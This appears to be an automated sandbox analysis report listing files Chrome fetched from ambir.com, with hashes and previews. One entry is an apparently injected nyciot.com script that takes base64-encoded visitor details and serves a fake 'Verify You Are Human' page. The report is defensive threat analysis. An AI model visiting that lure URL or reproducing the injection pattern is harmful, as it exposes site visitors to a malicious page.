                                                                                                                                                                                              SSDEEP:6:6v/lhPU2AYfvl5wdITaZHny1AwsYeSZexK3IUpup:6v/7da+kyuoTi
                                                                                                                                                                                              MD5:583A10EA18008F0447FCB6D1A5C3CF8F
                                                                                                                                                                                              SHA1:5E7E7B999F58561F5FDB1FD4EEB4B090A659F628
                                                                                                                                                                                              SHA-256:BBC7070953AF36DFD2DEC15CAB26FB366A721E4AE5A6AA88DE14878258FD0AE0
                                                                                                                                                                                              SHA-512:2B8BF6B0E0B48CE5228B97055575B47BCE2D5595371D7AD53A572E5FCFA4B6E3B522E893E3E5EE6874555C7DD73D49A73E61038397760DEFDB2CE9E47CC408D7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.PNG........IHDR.............'..... cHRM..z%..............u0...`..:....o._.F....IDATx..Q..0.F.B(.@..@..@..Q..B..2(...w.+U..?.e.O.ul...9@W.K...v]w.T"m.&..@..7<..<F..2!..c.../<..a_Bd.I.(M.w..3...w[QB......p_..].2...K.dE.....H.j.:..._.>cR#~....*..a...dAv....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 70 x 69, 8-bit colormap, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):609
                                                                                                                                                                                              Entropy (8bit):7.506422050947946
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:6v/7ncMEejXzed4aVp4bBmGSUY3VDLMSMlakAHt3+Ypdx5EEePKSZ9:vMled4aCQGUMSMmN3+Yp5sf
                                                                                                                                                                                              MD5:607D397302B1F344F8D8DF1258004046
                                                                                                                                                                                              SHA1:BE2F65980DF878CD5448C3069F29165FF839C211
                                                                                                                                                                                              SHA-256:0015FEA1D81D92A7C847E78F4DC6B997A8FE53DC8CE575662AEA71FFB28E1E4C
                                                                                                                                                                                              SHA-512:1749DD3E452D969F70A2005AFC3BFA9C05ACA7AF1E84E9F752F2083A2B630FA67B943A86BDF6EA8A18DA6A90284AA3B50C8A0EF20FA5A73829DEC19A6A4588F3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.PNG........IHDR...F...E......d`....0PLTEGpL.U8.\F.\F.\E.]E.]E._?.\E.\E....]C.[C.??.[G.\DPV......tRNS..$P....c..1@....d<.....IDATx... ..s+....v..B.!.q6~...}()8...Ri3.f....1Y7^..........C..i3.A. Z.i..4.$....l.Ed.f...%m.N..p......CH.....{...e.\Z.E.]....7.X.()..|.O...+{........G.....I}'r.{../x.|..v.5.H"...,.3....b.P...........3........c....#F..'....M....s..&LZ..".M...U...Z.<U..j........I^/...c .. f~.#z.Y1.Mr~.3..Ia0.7..y.Y.`..p.b ...z.?._o|.:..z.t...n.....^.[\...!nu..3.~Cz^.z/d9...2.k..N..N0{8..x./...._.@..........7U....^Uz...W........5.v...|..p....<.(.Q...'&..o~.>.....n..d....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                              Entropy (8bit):7.320764681183866
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:XZfnS7/UmLVZ6EW4eeyTEyGChriVjrN1QKMiy5Azt90AvmJuLJt/PS14Nv8REqNn:RS7cmLbvWftIyV9iVF1kiy2o9wLTS1Q2
                                                                                                                                                                                              MD5:C7D8A3D8E486C5E0E2A340CCEE692CEF
                                                                                                                                                                                              SHA1:20CA8B41C81786E75B28C7F8A8F48E3A0134A842
                                                                                                                                                                                              SHA-256:CBBEE2B6E521ABC89B1A3A0849F210368054D3E5FA229E7204253F57C7582CC4
                                                                                                                                                                                              SHA-512:0618014C55C3C84CEB50BF20E6642EB92643C06B8EF284F9C8FC3081D3AC9BC380F95DF6EBF60874B92FC52447C64320D09F542325C0C4C6EB4597994585CFC0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/images/cerrar2.png
                                                                                                                                                                                              Preview:RIFF\...WEBPVP8LO.../-@..`.m......@...U.._.!C.........z.?...6RT....n..T...r..U/..B.L....A....a......l....H.....`..N.x....^`.......!.=L..s.H.-4......x.wa".x...l.....1.'.]<..."..|...'.........v.5....Ry.K.8.M$qN.......!.<..8. \..M..:.r.....C. .Q....I)..Id...Z..ke.if..ti.rV.S.....^....Cg.w.zG.w..&..H....)s.`........8.'.....&.N..JD..x.P...
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (542), with CRLF line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):15754
                                                                                                                                                                                              Entropy (8bit):4.79476680649664
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:XvOUZFAp1ZBDbT/fYi/8H3gGSIe11mPAaNeexdwiAwdBG4nRvqPt5BZmHoBi5s3X:X6edHvS2HoBi5s3isQs
                                                                                                                                                                                              MD5:6F0BEF4C73D66AC474E06A7291219B01
                                                                                                                                                                                              SHA1:E1651A5BC90FBB742B1F6555E2EE1BF80182CC45
                                                                                                                                                                                              SHA-256:D89A755C25439ED6BCBD49C79D064EAF1746A3AEBCD59B0C91F60582AF84714A
                                                                                                                                                                                              SHA-512:F76CEB4A40B35A6980378DF84ED8D7BA06C9969C7E30C686AF93A692FF45CADD62BC60DF09B0F895D948AA935BEA9E424D5043881D25E5E52B08A5340C520F05
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://nyciot.com/js.php?device=windows&ip=OC40Ni4xMjMuNzU=&refferer=aHR0cHM6Ly9hbWJpci5jb20vYW1iaXItY2FyZC1zY2FubmVycy8=&browser=Q2hyb21l&ua=bW96aWxsYS81LjAgKHdpbmRvd3MgbnQgMTAuMDsgd2luNjQ7IHg2NCkgYXBwbGV3ZWJraXQvNTM3LjM2IChraHRtbCwgbGlrZSBnZWNrbykgY2hyb21lLzExNy4wLjAuMCBzYWZhcmkvNTM3LjM2&domain=aHR0cHM6Ly9ueWNpb3QuY29t&loc=VVM=&is_ajax=1
                                                                                                                                                                                              Preview: ..<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Verify You Are Human</title>.. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">.. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.0/css/all.css">.. <link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet' type='text/css'>.. <style>... ... body, html {.. margin: 0;.. padding: 0;.. width: 100%;.. height: 100%;.. display: flex;.. justify-content: center;.. align-items: center;.. font-family: 'Roboto', sans-serif;.....font-style:normal;.....font-weight:400;.. background: #f2f2f2;.. color: #333;.....font-size:14px;.. }.... .xT-fde-85495406 {.. text-align: cente
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):21825
                                                                                                                                                                                              Entropy (8bit):5.077106803161156
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:0GrWbqNd65+Kxcl34KilF1kxJMnoDRN9uFLB9HGSE7BNcZiKFUAQcXrKEpw+n6oI:TWRPcIFqBRN9uF9oSjZiqUAQkpwg6oyb
                                                                                                                                                                                              MD5:6684BC6B823D784DC489B10A8C67060F
                                                                                                                                                                                              SHA1:09125085C722D36E36509A1FA058EB466F7DE119
                                                                                                                                                                                              SHA-256:360553A940B900DA64652BB7A26D2595F6CB477489E94B9F950932A321774916
                                                                                                                                                                                              SHA-512:86E35773791E95021F3D04C65471829A11210AB7BCD151A278076BEC882E78E0012A20F42CC8D508BE4D2B4557F4CDC6647AE1D6AD94F694B2B295E02C88E925
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/style.css?v=1732127239
                                                                                                                                                                                              Preview:/*.Theme Name: Ambir Technologies.Author: Andres J. Villar.Author URI: https://meritdesigns.com.Description: Theme Wordpress.Version: 2.0 .*/.:root {...--white: #ffffff;..--orange: #cc6600;..--hover: #b85c00;..--black: #000000;..--primary: #333;.}.html, body{..height: 100%;.}.body {..background: #fff;..font-family: 'Open Sans', sans-serif;..font-size: 15px;..color: var(--primary);..font-weight: 400;.}..elementor hr {..margin-top: 24px;..margin-bottom: 24px;.}..container, .container-fluid, .elementor-section-full_width .elementor-container, ..elementor-section.elementor-section-boxed > .elementor-container {. width: 1220px;. max-width: 100%;. margin: 0 auto;.}..elementor-section-boxed {..width: 1220px;..max-width: 100%;..margin: 0 auto;..overflow-x: hidden;.}..elementor-column-gap-default > .elementor-column > .elementor-element-populated {. padding: 0;.}..elementor-col-50, .elementor-col-33, .elementor-col-100, .elementor-col-66 {..padding-left: 15px;..padding-right:15px;.}..cle
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (6414)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):385720
                                                                                                                                                                                              Entropy (8bit):5.582231539083089
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:S4OVMX/iOG9ezPmPL97aBJDMfgQJrjOg3x0/aHY:bOQ6QzPmR7fd4
                                                                                                                                                                                              MD5:90FC9FCDEF2008480442DC6E560C3531
                                                                                                                                                                                              SHA1:5EBB4DA23F60E9428411A070D340178B20F19320
                                                                                                                                                                                              SHA-256:B1AFAFF5ACA012E13E63512ACD9DB643A459680FBFF61643CEDFA0C41A683D93
                                                                                                                                                                                              SHA-512:61735A3DAF53D0E7A193DD11497AF19B6DE608151A50D83DDE12BE6DA1BBCE88FA3240610341F310D5811B61F9CCB23856C5F149CCD478E897BC72F8F0384277
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=AW-1070729751&l=dataLayer&cx=c&gtm=45He4bj0v833545045za200
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":26,"vtp_rules":["list","^ambir\\-technology\\.myshopify\\.com$","^ambir\\.com$"],"tag_id":14},{"function":"__ogt_ads_datatos","priority":26,"vtp_instanceDestinationId":"AW-1070729751","tag_id":36},{"function":"__ogt_1p_data_v2","priority":16,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":true,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"#TextField4","vtp_isAutoEnabled":true,"vtp_manualPhoneEnabled":true,"vtp_manualAddressEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_postalCodeValue":"#TextField5","vtp_lastNameValue":"#TextField1","vtp_phoneType":"CSS_SELECTOR","vtp
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=105&external_user_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&expiration=1763670519&C=1
                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (2530)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):277537
                                                                                                                                                                                              Entropy (8bit):5.560459710296879
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:+gYpTAX/D+OReWt0tBgDwPAjIJ8UUlPM22KiDUG7Z0DmoMfgQJUwYbD:+MX/iORedPmPx276DmoMfgQJUH
                                                                                                                                                                                              MD5:5CE3D9BF2A71A8FEC6448192AEA4D3BA
                                                                                                                                                                                              SHA1:B9C939176A7E4733D8CB17EE6FC0C02988C0AEB1
                                                                                                                                                                                              SHA-256:A40767692D58CC4CD82A0C3BB1D832E86F7BB64BB413B42588231C53990BAC22
                                                                                                                                                                                              SHA-512:AE65CB5B35DF9090DEABBCF9048283FD8B8C51CD945E551FB0E3B7EAF6AF0450D9E56A54E645396827488F1F341EE1A6B5F31D98C75D9EFFBA4A54D14799E889
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.purchase.actionField.order_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.purchase.actionField.revenue"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.currencyCode"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):18536
                                                                                                                                                                                              Entropy (8bit):7.986571198050597
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                                                                                                              MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                                                                                              SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                                                                                              SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                                                                                              SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                              Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (32010)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1190123
                                                                                                                                                                                              Entropy (8bit):5.491431189755651
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:IkRJXt12JbrJSjFpxd5Q04o+R2om76yHA2oiLKOBz0SR:I2JXt12JbrQjFpxHQbrD4MiLBz0SR
                                                                                                                                                                                              MD5:713BD4A23A0C3D6063B357D9D50E440C
                                                                                                                                                                                              SHA1:B25695CC2EABD2BD15A8AA521CE5C3ED4F777B07
                                                                                                                                                                                              SHA-256:46CC6ABE12720C78BA6F8F936D8ED5A70011625488B10967A5575A19E5263756
                                                                                                                                                                                              SHA-512:E17C2C865784EC23BA52A12A8AE715F3341A3C17A39ED58464286EC2AC2B5512E1DBE23C5667350DFAC39E25A25DFBC9B350E7ED629B74DD48367D3C53BB6BE2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:!function e(t,n,r){function o(a,s){if(!n[a]){if(!t[a]){var l="function"==typeof require&&require;if(!s&&l)return l(a,!0);if(i)return i(a,!0);var c=new Error("Cannot find module '"+a+"'");throw c.code="MODULE_NOT_FOUND",c}var u=n[a]={exports:{}};t[a][0].call(u.exports,function(e){var n=t[a][1][e];return o(n?n:e)},u,u.exports,e,t,n,r)}return n[a].exports}for(var i="function"==typeof require&&require,a=0;a<r.length;a++)o(r[a]);return o}({1:[function(e,t,n){"use strict";function r(){if(l.length)throw l.shift()}function o(e){var t;(t=s.length?s.pop():new i).task=e,a(t)}function i(){this.task=null}var a=e("./raw"),s=[],l=[],c=a.makeRequestCallFromTimer(r);t.exports=o,i.prototype.call=function(){try{this.task.call()}catch(e){o.onerror?o.onerror(e):(l.push(e),c())}finally{this.task=null,s[s.length]=this}}},{"./raw":2}],2:[function(e,t,n){(function(e){"use strict";function n(e){s.length||(a(),l=!0),s[s.length]=e}function r(){for(;c<s.length;){var e=c;if(c+=1,s[e].call(),c>u){for(var t=0,n=s.len
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):757
                                                                                                                                                                                              Entropy (8bit):5.135828761761753
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:UCX7HAXNph7hHijN8IUH/uQc7Ib18mRBmK+4y12EwdwKgA65txItSQMa7QyX7GoH:DX6SOuQNKK+4LERKgA+txoS2yo+RRJ34
                                                                                                                                                                                              MD5:F57FDAB19B54E119DB8B7888C1C9F525
                                                                                                                                                                                              SHA1:1545D311B84946D5BCEEA0FBA53663C233DFC2B4
                                                                                                                                                                                              SHA-256:9293767BEC4F0BE8D5B8CC4B88088DC61052B4E8D691E1438FB771C183A1BA89
                                                                                                                                                                                              SHA-512:572475198B3BB6EFF49C4F3CCBCD5F7FCD6B5C09AE7BA6B126DA0777FA4D583DCEADBDD1A3EE836A8EDA36D2CD084F80F898A9BDD0F34179D337363016445C9D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://knrpc.olark.com/nrpc/p?j=olark-21732134555374&&c=pollevents&q=6387.55374.2&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&g=undefined&cb=hbl.client.callbacks.pollevents&next_poll_time=15000&version=api-1.2.1&pretty=true&_rnd=0.7786832371860779
                                                                                                                                                                                              Preview:/**/try{hbl.client.callbacks.pollevents(.{. "capacity": false,. "conversation_has_slot": false,. "conversation_id": "tM65kxeIWm5Vcm4e542fr0UBjA8B6bor",. "in_active_conversation": false,. "ipaddress": "8.46.123.75",. "is_popup": false,. "last_index": 0.0,. "machine": "nrpc-http-5d9875854f-cnpmt",. "new_events": [],. "operator_composing_state": "active",. "operator_has_sent_message": false,. "operator_nickname": null,. "resend_nickname": false,. "resend_status": false,. "site_is_online": false,. "status_state": "offline",. "visitor_id": "QnUrnKaYLl744rSP542fr0UBrj6a8ok0".}.);}catch(e){}try{if(document.getElementById('olark-21732134555374')) hbl.util.remove_element('olark-21732134555374');}catch(e){}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                              Entropy (8bit):4.347811435468635
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=fd66934f-cc4b-4a94-91f3-b309aaa3bde2&ttd_puid=fca0ae6b-4903-4b6e-b6de-6aa8c515508a%2C%2C
                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 13528, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13528
                                                                                                                                                                                              Entropy (8bit):7.985372257633372
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:wS3ALwq0vr5+wbiIwRQc0ENKY9/mNVUpIpZryP:B3BpkIfwRQ189/mNV0D
                                                                                                                                                                                              MD5:200C41F352C466E1C2B117656A0256E8
                                                                                                                                                                                              SHA1:117895B042DB3C7CE867C807A63F238148C85BF7
                                                                                                                                                                                              SHA-256:A70C2BC728EB261AC55C2FF878249947BCD3A9D8827D94E63FBDD8FE67156986
                                                                                                                                                                                              SHA-512:25400DC5FD5B697583961181B8305FB4F65B1040A678EB200951F589F37A9961AF1897085A7EC25C4C06475751EDE3CD4711AD3443D75588CD05D8185EE2A8C8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBBc4AMP6lQ.woff2
                                                                                                                                                                                              Preview:wOF2......4.......l...4~.............................Z..|.`..J.....d.5..Z..6.$..0. ..|. ..]....8..^..v+..5%v.8.JN...O...*~...TwK...::.v....}.Z....~.7Q..r.1rS....q8....lm.|.rP.wV~.Q......G...2(..."..q>j.........L....#9...A......F.5PA.i...$..Q#z..UR.....,..Q.0.....5.....veRU.FGFu|..U........6.._.`,...6f!<...8j..h...*...1....Kp./Pm.5vN{....#|.~.H._.........b......Q6l..*..:.z......@d.B.J%Z.tz...}.....0.$....3-.!...}......Z#i...hf.........T.A............,...[...]..x.....s. t..z.fgW..$...t.I2...G.....l...z..0{;....C.u.&.......)]...u.T.LD.......|.Sn..>..J4..v=.....N..r]...lg.t`..Z...P..u..(,.\..}HND..f..g.-3..b%.. !.~..C..D.+..=..S..*......6..<v}....W../..@$...D..d.u..*R...5(.. ..!H8.5H.?......B.E+CG0(B1JPzp.P.4.t..4.../.CIv.....~......`{m1...@`...A..DE..Rst.`Z.we...X[....f{W..v{.[o.K....W#t..x..%B....^.OL.....]..(.C...~.v....j\..].7.g.W..].....:...;...5..t.]/..S.{u..b..c..[{.it.{...Y/.S..m[ROXc[1.n.-.@5.rL......$..n.r6.T...}...-^..;...c...........1.?./
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (6414)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):385726
                                                                                                                                                                                              Entropy (8bit):5.582152874843394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:S4OVMX/iOG9iJPmPL97aBJDMfgQJrjOg3x0/aHY:bOQ6sJPmR7fd4
                                                                                                                                                                                              MD5:CFA122CAC14BF6CA8AA01D4CFE52DA1D
                                                                                                                                                                                              SHA1:9014AE7DF451533FE8052E209EBF7BAF2EE35F51
                                                                                                                                                                                              SHA-256:5B8951283224115F2DF7433695E923B96477FD48AAE879952EC70A5C282CD85B
                                                                                                                                                                                              SHA-512:7BD78B224D16F214D11D7FD55A049178CAED97F0623E74EF3DAAA44FD76983E8E17960E5D96672C5D7F154102A23B2D21C92EB32A3B58012B72D3525E4964400
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":26,"vtp_rules":["list","^ambir\\-technology\\.myshopify\\.com$","^ambir\\.com$"],"tag_id":14},{"function":"__ogt_ads_datatos","priority":26,"vtp_instanceDestinationId":"AW-1070729751","tag_id":36},{"function":"__ogt_1p_data_v2","priority":16,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":true,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"#TextField4","vtp_isAutoEnabled":true,"vtp_manualPhoneEnabled":true,"vtp_manualAddressEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_postalCodeValue":"#TextField5","vtp_lastNameValue":"#TextField1","vtp_phoneType":"CSS_SELECTOR","vtp
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (32019)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):89367
                                                                                                                                                                                              Entropy (8bit):5.3114345612848854
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:R69xntdnuB9Rvx8yx2KFQuBmxyL77+gEB/P2EEOfJyLD1MoR4:R69xtdKLDPQ6/GBPFEOfCML
                                                                                                                                                                                              MD5:019CB5DE92BC44487414CF2DF570EB1F
                                                                                                                                                                                              SHA1:648EBF82BD015BC530F5BE00DB24589EF325C466
                                                                                                                                                                                              SHA-256:CAA53054DC12F4194410B03956C943038CFC7963C54B95C2FCAB47F2AECB6111
                                                                                                                                                                                              SHA-512:2202AE0C32E1BEB049AE012870591BE949E16ECD7EFE705E7E1E72FCF9047ADECADE83B2E1476B82E92C0D3C8EDA8DCF3FC7ADB822F2EC0E0245FADB2B965D70
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
